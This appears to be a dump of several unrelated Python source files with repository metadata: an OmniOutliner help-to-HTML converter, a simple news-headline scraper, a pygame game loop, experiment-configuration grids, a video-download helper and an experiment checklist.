fileHeader(tocFile, bookTitle, """<meta name="robots" content="noindex">""", isTop=True, url='top.html')
print >> tocFile, """
<div class="top-all">
<div class="top-left">
<img src="%(imagePath)sIcon.png" alt="Application Icon" height="128" width="128" border="0">
<h1>%(bookTitle)s</h1>
<p><a href="http://%(url)s">%(url)s</a></p>
</div>
<div class="top-right">
""" % {
'imagePath': IMAGE_PATH,
'bookTitle': bookTitle,
'url': COMPANY_URL
}
for childrenNode in findSubNodes(oneNode, 'children'):
for itemNode in findSubNodes(childrenNode, 'item'):
subText = digItem(itemNode, 2, [])
frameness = ''
#if not subText['destination']:
# frameFile = open(outputPath + '/' + subText['anchor'] + 'frame.html', 'w')
# fileFrames(frameFile, subText['text'], subText['anchor'])
# frameness = 'frame'
print >> tocFile, '<p><a href="%(anchor)s.html">%(text)s</a></p>' % {
'anchor': subText['anchor'] + frameness,
'text': subText['text']
}
print >> tocFile, """
</div>
</div>
"""
fileFooter(tocFile)
tocFile.close()
# create a help index on the iteration that has no navi
#if not oneNaviIteration:
# print commands.getoutput("""/Developer/Applications/Utilities/Help\ Indexer.app/Contents/MacOS/Help\ Indexer %s""" % (outputPath.replace(' ', '\ ')))
# check that all links are hooked up
links.sort()
anchors.sort()
anchorlessLinks = []
for oneLink in links:
if oneLink not in anchors:
anchorlessLinks.append(oneLink)
if len(anchorlessLinks):
print "\n_______Anchorless Links_______"
for oneLink in anchorlessLinks:
print oneLink
#print "\n_______All Links______________"
#for oneLink in links:
# print oneLink
#
#print "\n_______All Anchors____________"
#for oneAnchor in anchors:
# print oneAnchor
print "\n"
else:
print "Congratulations, all links are hooked up!"
else:
print """usage:
python OOhelpify.py OutlinerFile.oo3"""
def findHeadingType(style):
if style is not None and style.has_key(u'heading-type(com.omnigroup.OmniOutliner)'):
return str(style[u'heading-type(com.omnigroup.OmniOutliner)'])
return 'default'
def hasGrandChild(tehItem):
grandchild = False
for childrenNode in findSubNodes(tehItem, 'children'):
for itemNode in findSubNodes(childrenNode, 'item'):
gchild = findSubNodes(itemNode, 'children')
if gchild and len(gchild)>0:
grandchild = True
break
if grandchild: break
return grandchild
def hasChild(tehItem):
child = False
child = findSubNodes(tehItem, 'children')
if child and len(child)>0:
child = True
return child
def digItem2(tehFile, tehItem, level, passed_style=None):
items = 0
grandchild = hasGrandChild(tehItem)
#print "Grandchild: "+str(grandchild)
for childrenNode in findSubNodes(tehItem, 'children'):
text = ''
level_style = None
if level+styles_level_start < len(styles): level_style = styles[level+styles_level_start]
passed_heading = findHeadingType(passed_style)
level_heading = findHeadingType(level_style)
parent_heading = 'None'
if passed_heading!='default': parent_heading=passed_heading
elif level_heading!='default': parent_heading=level_heading
# print " "*level+'parent heading: '+str(parent_heading)
itemStyles = findStyles(tehItem)
parent_preness = None
for preItemStyles in itemStyles:
if u'Pre' in preItemStyles: parent_preness = 'Pre'
span_level = None
if level+1 <= len(span_levels): span_level = span_levels[level]
spc = " "*tab_spc*(level-len(span_levels))
pairs = []
for itemNode in findSubNodes(childrenNode, 'item'):
child_pairs = []
curr_style = None
child_style = None
style_idx = 0
preness = None
itemStyles = findStyles(itemNode)
if 'Pre' in itemStyles: preness = 'Pre'
else: preness = parent_preness
for styleElem in findSubNodes(itemNode, 'style'):
eval_style = findStyleValues(styleElem)
if style_idx==0: curr_style = eval_style
elif style_idx==1: child_style = eval_style
style_idx += 1
if not preness and eval_style.has_key('named_styles'):
if 'Pre' in eval_style['named_styles']: preness = 'Pre'
heading = findHeadingType(curr_style)
# print "current: "+heading
if heading=='default': heading = parent_heading
if preness=='Pre':
print >> tehFile, "<pre style=\"%s\">" % pre_style
pairs.append("</pre>")
elif span_level is not None:
if len(span_level)==0:
# tehFile.write(spc+"<p>")
if not hasChild(itemNode): child_pairs.append("<br/>\n")
else:
if items==0:
if heading in ['Legal','Numeric']:
tehFile.write(spc+"<ol>")
pairs.append("</ol>\n")
elif grandchild:
tehFile.write(spc+"<ul>")
pairs.append("</ul>\n")
else:
tehFile.write("<div>")
pairs.append("</div>\n")
else:
if heading not in ['Legal','Numeric'] and not grandchild:
print >> tehFile, "<br/>"
text = itemText(itemNode, preness)
if preness=='Pre': text = text.strip()
print text
# print " "*level+"["+str(level)+"] "+str(heading)+": "+text
if preness=='Pre':
tehFile.write(spc+text.strip())
elif span_level is not None:
if len(text)>0:
if len(span_level)==0:
if hasChild(itemNode):
tehFile.write(spc+text.strip())
else:
tehFile.write(spc+text.strip()+child_pairs[0])
child_pairs.pop()
elif heading in ['Legal','Numeric']:
print >> tehFile, spc+"""<span style="%(style)s">%(idx)s. %(text)s</span>""" % {'style':span_level, 'text':text, 'idx': items+1}
else:
print >> tehFile, spc+"""<span style="%(style)s">%(text)s</span>""" % {'style':span_level, 'text':text}
else:
if heading in ['Legal','Numeric'] or grandchild:
tehFile.write(spc+"<li>"+text.strip())
else:
tehFile.write(spc+text.strip())
childs = digItem2(tehFile, itemNode, level+1, child_style)
if len(child_pairs)==1:
tehFile.write(child_pairs[0])
child_pairs.pop()
elif span_level is None:
if preness=='Pre':
pass
elif heading in ['Legal','Numeric'] or grandchild:
if childs>0: print >> tehFile, spc+"</li>"
else: print >> tehFile, "</li>"
items += 1
pairs.reverse()
for pair in pairs:
tehFile.write(pair)
# print >> tehFile, pair
return items
def main2():
if len(sys.argv) >= 2:
global outputPath
inputPath = sys.argv[1]
if inputPath[-1] == '/':
inputPath = inputPath[0:-1]
inputTitle = inputPath.split('/')[-1].split('.')[0]
outputPath = inputPath + '/../%s/' % (inputTitle)
if not os.access(outputPath, os.F_OK):
os.mkdir(outputPath)
if not os.access(outputPath + '/HelpImages', os.F_OK):
os.mkdir(outputPath + '/HelpImages')
print inputPath+"\n"
f = codecs.open(inputPath + '/contents.xml', 'r', 'utf-8')
xmlString = f.read().encode('utf-8')
tehTree = parseString(xmlString)
f.close()
docNode = tehTree.documentElement
#print tehTree.documentElement.tagName
#print tehTree.documentElement.getAttribute('crap')
rootNode = None
for oneNode in findSubNodes(docNode, 'root'):
rootNode = oneNode
style_attr_idx = 0
for styleElem in findSubNodes(rootNode, 'style'):
print "[%(idx)s]" % {'idx':style_attr_idx}
ss = findStyleValues(styleElem)
styles.append(ss)
for i in ss:
print " %(key)s=%(val)s" % {'key':i, 'val':ss[i]}
style_attr_idx=style_attr_idx+1
for attachmentsNode in findSubNodes(docNode, 'attachments'):
for attachmentNode in findSubNodes(attachmentsNode, 'attachment'):
if attachmentNode.getAttribute('href'):
attachments[attachmentNode.getAttribute('id')] = attachmentNode.getAttribute('href')
if attachmentNode.getAttribute('href').find("__#$!@%!#__") == -1: ## get rid of INSANE outliner dupe files
shutil.copyfile((inputPath + '/' + attachmentNode.getAttribute('href')), outputPath + (IMAGE_PATH=="" and "" or '/'+IMAGE_PATH+'/') + attachmentNode.getAttribute('href'))
for oneNode in rootNode.childNodes:
if (oneNode.nodeType != TEXT_NODE) and (oneNode.tagName == 'item'):
text = itemText(oneNode, 'title')
global bookTitle, outFile
bookTitle = text
outFile = open(outputPath + '/index.html', 'w')
fileHeader(outFile, bookTitle, """<meta name="robots" content="noindex">""", isTop=True, url='top.html')
print text
print '*'*50
digItem2(outFile, oneNode, 0)
fileFooter(outFile)
outFile.close()
else:
print """usage:
python OOblogger.py OutlinerFile.oo3"""
if __name__ == "__main__":
main2()
|
[
"tcchou@tcchou.org"
] |
tcchou@tcchou.org
|
a152bc78bddc4bf1c731156309bbc5506185b2ed
|
8392b68623f8ad3f7f7c362d6feb5580d71c3be5
|
/learn/basic_scraper.py
|
d891de0bb9b52c61fe0e6c2ade32a9c7384dd9ac
|
[
"MIT"
] |
permissive
|
postsent/unsw_course_filter
|
27350e3196864a61d8b7287ec9a6f8013cdefa4a
|
b58cb3d6f3fb4fb84e2031be6c6511fb5b9c343f
|
refs/heads/main
| 2023-05-04T12:43:55.198273
| 2021-01-01T08:13:30
| 2021-01-01T08:13:30
| 318,668,859
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 495
|
py
|
from bs4 import BeautifulSoup
import requests
url_verge = "https://www.theverge.com/tech"
#url = "http://ethans_fake_twitter_site.surge.sh/"
response = requests.get(url_verge, timeout=5)
content = BeautifulSoup(response.content, "html.parser")
#print(content) # print out all html for the wepage
tweet = content.findAll('h3', attrs={"class":"c-entry-box-base__headline"}) # here class == c-entry...
for i, t in enumerate(tweet):
print(t.text)
print()
if (i == 3): break
#print(tweet)
|
[
"junyu.wei@student.unsw.edu.au"
] |
junyu.wei@student.unsw.edu.au
|
10d9feda10195e4480c5d4c1b50b0c75a74a8007
|
564b4b834516512b9b129781d2b19ae33aebd99a
|
/src/main.py
|
e9ff6e96c05a3765fe7c922d62db94221d69eb29
|
[] |
no_license
|
nuclearkittens/reindeer-road
|
941db18639adc8be33375ca865e57fc7a56cff3a
|
9b3f71465109cb3c7db9717c8df82262505bdce2
|
refs/heads/master
| 2023-06-12T03:50:57.857684
| 2021-07-04T11:47:30
| 2021-07-04T11:47:30
| 382,577,781
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,478
|
py
|
import sys
import os
import pygame as pg
from config import SCREEN_W, SCREEN_H, SCREEN_CAPTION, SKY_COLOUR, MUSIC
from util import initialise_display, check_events
from view import View
from car import Car
class MainGame:
def __init__(self):
pg.init()
self._clock = pg.time.Clock()
self._display = initialise_display()
self._view = View(2)
self._car = Car()
self.look_out = False
self.car = True
def game_loop(self):
running = True
pg.mixer.music.load(MUSIC)
pg.mixer.music.play(loops=-1)
while running:
running, clicked = check_events()
if self.car:
action = self._car.update(self._display, clicked)
if action:
self.car = False
if action == 'window':
self.look_out = True
if self.look_out:
self._display.fill(SKY_COLOUR)
self._view.render_view(self._display)
back = self._view.go_back(self._display)
if back and clicked:
self.look_out = False
self.car = True
pg.display.update()
self._clock.tick(60)
self.car = False
self.view = False
pg.mixer.music.stop()
pg.mixer.music.unload()
pg.quit()
sys.exit()
if __name__ == '__main__':
g = MainGame()
g.game_loop()
|
[
"meri.saynatkari@gmail.com"
] |
meri.saynatkari@gmail.com
|
d80f9f71c158eff29e2074d719a4f038dfc10f15
|
0e1e643e864bcb96cf06f14f4cb559b034e114d0
|
/Exps_7_v3/doc3d/Wyx_w_M_w_Sob_to_Wz_focus/Sob_Wxy/Sob_k25_s001_EroM_Mae_s001/pyr_Tcrop256_p60_j15/pyr_3s/L8/step11_L2345678.py
|
543c1203989ffd14a032598f8a48aa53aacf6b50
|
[] |
no_license
|
KongBOy/kong_model2
|
33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307
|
1af20b168ffccf0d5293a393a40a9fa9519410b2
|
refs/heads/master
| 2022-10-14T03:09:22.543998
| 2022-10-06T11:33:42
| 2022-10-06T11:33:42
| 242,080,692
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,765
|
py
|
#############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### 把 kong_model2 加入 sys.path
import os
code_exe_path = os.path.realpath(__file__) ### 目前執行 step10_b.py 的 path
code_exe_path_element = code_exe_path.split("\\") ### 把 path 切分 等等 要找出 kong_model 在第幾層
kong_layer = code_exe_path_element.index("kong_model2") ### 找出 kong_model2 在第幾層
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1]) ### 定位出 kong_model2 的 dir
import sys ### 把 kong_model2 加入 sys.path
sys.path.append(kong_model2_dir)
# print(__file__.split("\\")[-1])
# print(" code_exe_path:", code_exe_path)
# print(" code_exe_path_element:", code_exe_path_element)
# print(" kong_layer:", kong_layer)
# print(" kong_model2_dir:", kong_model2_dir)
###############################################################################################################################################################################################################
# 按F5執行時, 如果 不是在 step10_b.py 的資料夾, 自動幫你切過去~ 才可 import step10_a.py 喔!
code_exe_dir = os.path.dirname(code_exe_path) ### 目前執行 step10_b.py 的 dir
if(os.getcwd() != code_exe_dir): ### 如果 不是在 step10_b.py 的資料夾, 自動幫你切過去~
os.chdir(code_exe_dir)
# print("current_path:", os.getcwd())
###############################################################################################################################################################################################################
import Exps_7_v3.doc3d.Wyx_w_M_to_Wz_focus.pyr_Tcrop256_pad20_jit15.pyr_0s.L8.step10_a as L8_0side
import Exps_7_v3.doc3d.Wyx_w_M_to_Wz_focus.pyr_Tcrop256_pad20_jit15.pyr_1s.L8.step10_a as L8_1side
import Exps_7_v3.doc3d.Wyx_w_M_to_Wz_focus.pyr_Tcrop256_pad20_jit15.pyr_2s.L8.step10_a as L8_2side
import step10_a as L8_3side
#################################################################################################################################################################################################################################################################################################################################################################################################
########
# 1side_1
########
ch032_1side_1__23side_all = [
[L8_1side.ch032_1side_1 , L8_3side.empty , ],
[L8_2side.ch032_1side_1__2side_1 , L8_3side.ch032_1side_1__2side_1__3side_1 , ],
]
########
# 1side_2
########
ch032_1side_2__23side_all = [
[L8_1side.ch032_1side_2 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_2__2side_1 , L8_3side.ch032_1side_2__2side_1__3side_1 , L8_3side.empty , ],
[L8_2side.ch032_1side_2__2side_2 , L8_3side.ch032_1side_2__2side_2__3side_1 , L8_3side.ch032_1side_2__2side_2__3side_2 , ],
]
########
# 1side_3
########
ch032_1side_3__23side_all = [
[L8_1side.ch032_1side_3 , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_3__2side_1 , L8_3side.ch032_1side_3__2side_1__3side_1 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_3__2side_2 , L8_3side.ch032_1side_3__2side_2__3side_1 , L8_3side.ch032_1side_3__2side_2__3side_2 , L8_3side.empty , ],
[L8_2side.ch032_1side_3__2side_3 , L8_3side.ch032_1side_3__2side_3__3side_1 , L8_3side.ch032_1side_3__2side_3__3side_2 , L8_3side.ch032_1side_3__2side_3__3side_3 , ],
]
########
# 1side_4
########
ch032_1side_4__23side_all = [
[L8_1side.ch032_1side_4 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_4__2side_1 , L8_3side.ch032_1side_4__2side_1__3side_1 , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_4__2side_2 , L8_3side.ch032_1side_4__2side_2__3side_1 , L8_3side.ch032_1side_4__2side_2__3side_2 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_4__2side_3 , L8_3side.ch032_1side_4__2side_3__3side_1 , L8_3side.ch032_1side_4__2side_3__3side_2 , L8_3side.ch032_1side_4__2side_3__3side_3 , L8_3side.empty , ],
[L8_2side.ch032_1side_4__2side_4 , L8_3side.ch032_1side_4__2side_4__3side_1 , L8_3side.ch032_1side_4__2side_4__3side_2 , L8_3side.ch032_1side_4__2side_4__3side_3 , L8_3side.ch032_1side_4__2side_4__3side_4 , ],
]
########
# 1side_5
########
ch032_1side_5__23side_all = [
[L8_1side.ch032_1side_5 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_5__2side_1 , L8_3side.ch032_1side_5__2side_1__3side_1 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_5__2side_2 , L8_3side.ch032_1side_5__2side_2__3side_1 , L8_3side.ch032_1side_5__2side_2__3side_2 , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_5__2side_3 , L8_3side.ch032_1side_5__2side_3__3side_1 , L8_3side.ch032_1side_5__2side_3__3side_2 , L8_3side.ch032_1side_5__2side_3__3side_3 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_5__2side_4 , L8_3side.ch032_1side_5__2side_4__3side_1 , L8_3side.ch032_1side_5__2side_4__3side_2 , L8_3side.ch032_1side_5__2side_4__3side_3 , L8_3side.ch032_1side_5__2side_4__3side_4 , L8_3side.empty , ],
[L8_2side.ch032_1side_5__2side_5 , L8_3side.ch032_1side_5__2side_5__3side_1 , L8_3side.ch032_1side_5__2side_5__3side_2 , L8_3side.ch032_1side_5__2side_5__3side_3 , L8_3side.ch032_1side_5__2side_5__3side_4 , L8_3side.ch032_1side_5__2side_5__3side_5 , ],
]
########
# 1side_6
########
ch032_1side_6__23side_all = [
[L8_1side.ch032_1side_6 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_6__2side_1 , L8_3side.ch032_1side_6__2side_1__3side_1 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_6__2side_2 , L8_3side.ch032_1side_6__2side_2__3side_1 , L8_3side.ch032_1side_6__2side_2__3side_2 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_6__2side_3 , L8_3side.ch032_1side_6__2side_3__3side_1 , L8_3side.ch032_1side_6__2side_3__3side_2 , L8_3side.ch032_1side_6__2side_3__3side_3 , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_6__2side_4 , L8_3side.ch032_1side_6__2side_4__3side_1 , L8_3side.ch032_1side_6__2side_4__3side_2 , L8_3side.ch032_1side_6__2side_4__3side_3 , L8_3side.ch032_1side_6__2side_4__3side_4 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_6__2side_5 , L8_3side.ch032_1side_6__2side_5__3side_1 , L8_3side.ch032_1side_6__2side_5__3side_2 , L8_3side.ch032_1side_6__2side_5__3side_3 , L8_3side.ch032_1side_6__2side_5__3side_4 , L8_3side.ch032_1side_6__2side_5__3side_5 , L8_3side.empty , ],
[L8_2side.ch032_1side_6__2side_6 , L8_3side.ch032_1side_6__2side_6__3side_1 , L8_3side.ch032_1side_6__2side_6__3side_2 , L8_3side.ch032_1side_6__2side_6__3side_3 , L8_3side.ch032_1side_6__2side_6__3side_4 , L8_3side.ch032_1side_6__2side_6__3side_5 , L8_3side.ch032_1side_6__2side_6__3side_6 , ],
]
########
# 1side_7
########
ch032_1side_7__23side_all = [
[L8_1side.ch032_1side_7 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_7__2side_1 , L8_3side.ch032_1side_7__2side_1__3side_1 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_7__2side_2 , L8_3side.ch032_1side_7__2side_2__3side_1 , L8_3side.ch032_1side_7__2side_2__3side_2 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_7__2side_3 , L8_3side.ch032_1side_7__2side_3__3side_1 , L8_3side.ch032_1side_7__2side_3__3side_2 , L8_3side.ch032_1side_7__2side_3__3side_3 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_7__2side_4 , L8_3side.ch032_1side_7__2side_4__3side_1 , L8_3side.ch032_1side_7__2side_4__3side_2 , L8_3side.ch032_1side_7__2side_4__3side_3 , L8_3side.ch032_1side_7__2side_4__3side_4 , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_7__2side_5 , L8_3side.ch032_1side_7__2side_5__3side_1 , L8_3side.ch032_1side_7__2side_5__3side_2 , L8_3side.ch032_1side_7__2side_5__3side_3 , L8_3side.ch032_1side_7__2side_5__3side_4 , L8_3side.ch032_1side_7__2side_5__3side_5 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_7__2side_6 , L8_3side.ch032_1side_7__2side_6__3side_1 , L8_3side.ch032_1side_7__2side_6__3side_2 , L8_3side.ch032_1side_7__2side_6__3side_3 , L8_3side.ch032_1side_7__2side_6__3side_4 , L8_3side.ch032_1side_7__2side_6__3side_5 , L8_3side.ch032_1side_7__2side_6__3side_6 , L8_3side.empty , ],
[L8_2side.ch032_1side_7__2side_7 , L8_3side.ch032_1side_7__2side_7__3side_1 , L8_3side.ch032_1side_7__2side_7__3side_2 , L8_3side.ch032_1side_7__2side_7__3side_3 , L8_3side.ch032_1side_7__2side_7__3side_4 , L8_3side.ch032_1side_7__2side_7__3side_5 , L8_3side.ch032_1side_7__2side_7__3side_6 , L8_3side.ch032_1side_7__2side_7__3side_7 , ],
]
########
# 1side_8
########
ch032_1side_8__23side_all = [
[L8_1side.ch032_1side_8 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_1 , L8_3side.ch032_1side_8__2side_1__3side_1 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_2 , L8_3side.ch032_1side_8__2side_2__3side_1 , L8_3side.ch032_1side_8__2side_2__3side_2 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_3 , L8_3side.ch032_1side_8__2side_3__3side_1 , L8_3side.ch032_1side_8__2side_3__3side_2 , L8_3side.ch032_1side_8__2side_3__3side_3 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_4 , L8_3side.ch032_1side_8__2side_4__3side_1 , L8_3side.ch032_1side_8__2side_4__3side_2 , L8_3side.ch032_1side_8__2side_4__3side_3 , L8_3side.ch032_1side_8__2side_4__3side_4 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_5 , L8_3side.ch032_1side_8__2side_5__3side_1 , L8_3side.ch032_1side_8__2side_5__3side_2 , L8_3side.ch032_1side_8__2side_5__3side_3 , L8_3side.ch032_1side_8__2side_5__3side_4 , L8_3side.ch032_1side_8__2side_5__3side_5 , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_6 , L8_3side.ch032_1side_8__2side_6__3side_1 , L8_3side.ch032_1side_8__2side_6__3side_2 , L8_3side.ch032_1side_8__2side_6__3side_3 , L8_3side.ch032_1side_8__2side_6__3side_4 , L8_3side.ch032_1side_8__2side_6__3side_5 , L8_3side.ch032_1side_8__2side_6__3side_6 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_7 , L8_3side.ch032_1side_8__2side_7__3side_1 , L8_3side.ch032_1side_8__2side_7__3side_2 , L8_3side.ch032_1side_8__2side_7__3side_3 , L8_3side.ch032_1side_8__2side_7__3side_4 , L8_3side.ch032_1side_8__2side_7__3side_5 , L8_3side.ch032_1side_8__2side_7__3side_6 , L8_3side.ch032_1side_8__2side_7__3side_7 , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_8 , L8_3side.ch032_1side_8__2side_8__3side_1 , L8_3side.ch032_1side_8__2side_8__3side_2 , L8_3side.ch032_1side_8__2side_8__3side_3 , L8_3side.ch032_1side_8__2side_8__3side_4 , L8_3side.ch032_1side_8__2side_8__3side_5 , L8_3side.ch032_1side_8__2side_8__3side_6 , L8_3side.ch032_1side_8__2side_8__3side_7 , L8_3side.ch032_1side_8__2side_8__3side_8 , ],
]
########
# 1side_9
########
ch032_1side_9__23side_all = [
[L8_1side.ch032_1side_9 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_1 , L8_3side.ch032_1side_9__2side_1__3side_1 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_2 , L8_3side.ch032_1side_9__2side_2__3side_1 , L8_3side.ch032_1side_9__2side_2__3side_2 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_3 , L8_3side.ch032_1side_9__2side_3__3side_1 , L8_3side.ch032_1side_9__2side_3__3side_2 , L8_3side.ch032_1side_9__2side_3__3side_3 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_4 , L8_3side.ch032_1side_9__2side_4__3side_1 , L8_3side.ch032_1side_9__2side_4__3side_2 , L8_3side.ch032_1side_9__2side_4__3side_3 , L8_3side.ch032_1side_9__2side_4__3side_4 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_5 , L8_3side.ch032_1side_9__2side_5__3side_1 , L8_3side.ch032_1side_9__2side_5__3side_2 , L8_3side.ch032_1side_9__2side_5__3side_3 , L8_3side.ch032_1side_9__2side_5__3side_4 , L8_3side.ch032_1side_9__2side_5__3side_5 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_6 , L8_3side.ch032_1side_9__2side_6__3side_1 , L8_3side.ch032_1side_9__2side_6__3side_2 , L8_3side.ch032_1side_9__2side_6__3side_3 , L8_3side.ch032_1side_9__2side_6__3side_4 , L8_3side.ch032_1side_9__2side_6__3side_5 , L8_3side.ch032_1side_9__2side_6__3side_6 , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_7 , L8_3side.ch032_1side_9__2side_7__3side_1 , L8_3side.ch032_1side_9__2side_7__3side_2 , L8_3side.ch032_1side_9__2side_7__3side_3 , L8_3side.ch032_1side_9__2side_7__3side_4 , L8_3side.ch032_1side_9__2side_7__3side_5 , L8_3side.ch032_1side_9__2side_7__3side_6 , L8_3side.ch032_1side_9__2side_7__3side_7 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_8 , L8_3side.ch032_1side_9__2side_8__3side_1 , L8_3side.ch032_1side_9__2side_8__3side_2 , L8_3side.ch032_1side_9__2side_8__3side_3 , L8_3side.ch032_1side_9__2side_8__3side_4 , L8_3side.ch032_1side_9__2side_8__3side_5 , L8_3side.ch032_1side_9__2side_8__3side_6 , L8_3side.ch032_1side_9__2side_8__3side_7 , L8_3side.ch032_1side_9__2side_8__3side_8 , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_9 , L8_3side.ch032_1side_9__2side_9__3side_1 , L8_3side.ch032_1side_9__2side_9__3side_2 , L8_3side.ch032_1side_9__2side_9__3side_3 , L8_3side.ch032_1side_9__2side_9__3side_4 , L8_3side.ch032_1side_9__2side_9__3side_5 , L8_3side.ch032_1side_9__2side_9__3side_6 , L8_3side.ch032_1side_9__2side_9__3side_7 , L8_3side.ch032_1side_9__2side_9__3side_8 , L8_3side.ch032_1side_9__2side_9__3side_9 , ],
]
|
[
"s89334roy@yahoo.com.tw"
] |
s89334roy@yahoo.com.tw
|
ff1e2257ce5005af537692db19e78b2000464a7f
|
c2d130e40bbb5bb3f554b4b76cdac816e4637431
|
/request_handler/RequestRaw.py
|
80810915e1914708d1f413fc0e75349359bf4a3e
|
[] |
no_license
|
tznoordsij4/image-process-site
|
c35c3afa651c43dac60dea3c681393af065f477c
|
7884c59ae87997c7a99ec8418a8d3f69623c0342
|
refs/heads/master
| 2022-11-30T08:07:01.234264
| 2020-08-07T02:27:02
| 2020-08-07T02:27:02
| 269,240,670
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,010
|
py
|
import requests
from django.core.cache import cache
import random
#Class that takes the raw video src link from video attribute and downloads the video
class RequestRaw:
PATH = 'C:/Users/tznoo/Dev/image_process_site/static/temp_videos/downloaded_video.mp4'
def __init__(self,url,idset,driver_type = 'firefox'):
self.url = url
self.driver_type = driver_type
self.idset = idset
def download_video(self):
resp = requests.get(self.url)
id = RequestRaw.uniqueID(self.idset)
self.PATH = self.PATH.split(".")[0]+id+".mp4"
with open(self.PATH,'wb') as f:
f.write(resp.content)
# cache.add(id, f) cannot cache videos
print("video saved to file %s" % self.PATH)
return id
@staticmethod
def uniqueID(idset):
id = ""
for x in range(16):
id = id + str(random.randint(0,9))
if id in idset:
RequestRaw.uniqueID()
else:
return id
|
[
"tznoordsij@gmail.com"
] |
tznoordsij@gmail.com
|
e654c27d674364446b0b33ca1ab351182be5f2c1
|
9ed013dd2a186a2b417accb7d45053749e953313
|
/scripts/flow/time_resolved/checklist.py
|
ab0dc7589e1caffe0e510dcd2c4df554adf3a923
|
[] |
no_license
|
carlosarceleon/WTN2017_Presentation
|
9675f199ee36f6469cfd47ac4bcfe1faa24934d7
|
076b272e3c9e782800dd596efa02222a962783b3
|
refs/heads/master
| 2021-01-20T06:12:22.319350
| 2017-04-30T15:41:32
| 2017-04-30T15:41:32
| 89,853,570
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,291
|
py
|
import collections
checklist = collections.OrderedDict()
checklist[ 'STE_a0_p0_U20_z00_tr' ] = 1
checklist[ 'STE_a12_p0_U20_z00_tr' ] = 1
checklist[ 'STE_a-12_p0_U20_z00_tr' ] = 1
checklist[ 'Sr20R21_a0_p0_U20_z00_tr' ] = 1
checklist[ 'Sr20R21_a0_p0_U20_z05_tr' ] = 1
checklist[ 'Sr20R21_a0_p0_U20_z10_tr' ] = 1
checklist[ 'Sr20R21_a12_p0_U20_z00_tr' ] = 1
checklist[ 'Sr20R21_a12_p0_U20_z05_tr' ] = 1
